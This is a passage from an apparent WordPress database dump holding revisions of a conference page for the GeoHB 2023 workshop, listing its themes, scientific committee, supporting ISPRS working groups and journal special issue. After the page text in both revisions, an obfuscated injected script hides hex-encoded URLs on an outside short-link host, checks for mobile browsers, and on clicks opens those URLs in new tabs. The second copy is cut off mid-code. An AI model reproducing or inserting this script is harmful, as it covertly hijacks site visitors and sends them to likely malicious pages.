uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<p><strong>Scientific Committee:</strong></p>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<p><strong>Supporting ISPRS Working Groups:</strong></p>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong>Special Issue for the workshop:</strong></p>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 13:56:09','2023-01-07 13:56:09','',2791,'https://gsw2023.com/?p=3529',0,'revision','',0),
(3530,1,'2023-01-07 13:57:05','2023-01-07 13:57:05','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 